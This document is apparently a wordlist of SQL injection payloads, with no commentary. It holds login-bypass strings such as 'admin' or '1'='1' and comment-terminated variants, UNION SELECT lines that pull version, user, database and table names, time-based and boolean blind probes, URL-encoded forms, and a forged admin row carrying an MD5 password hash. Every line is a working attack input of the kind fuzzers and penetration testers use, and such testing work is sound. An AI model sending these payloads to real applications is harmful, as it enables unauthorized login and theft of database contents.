'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1-- 
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
'+UNION+SELECT+'abc','def'+FROM+dual--
%27%20OR%20%271%27%3D%271
%27%20OR%201%3D1--%20
%27%20OR%201%3D1%23
admin%27%20--%20
%27%20UNION%20SELECT%20null%2C%20version%28%29--%20
%27%20UNION%20SELECT%20user%28%29%2C%20database%28%29--%20
1%27%20AND%20SLEEP%285%29--%20
%27%20AND%201%3D2%20UNION%20SELECT%201%2C%20table_name%20FROM%20information_schema.tables--%20
%27%20AND%20ascii%28substr%28%28select%20database%28%29%29%2C1%2C1%29%29%3D115--%20
%27%20AND%20%28SELECT%20COUNT%28%2A%29%20FROM%20users%20WHERE%20username%3D%27admin%27%20AND%20LENGTH%28password%29%3E10%29%3D1--%20
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--
'+UNION+SELECT+'abc','def'#
'+UNION+SELECT+@@version,+NULL#
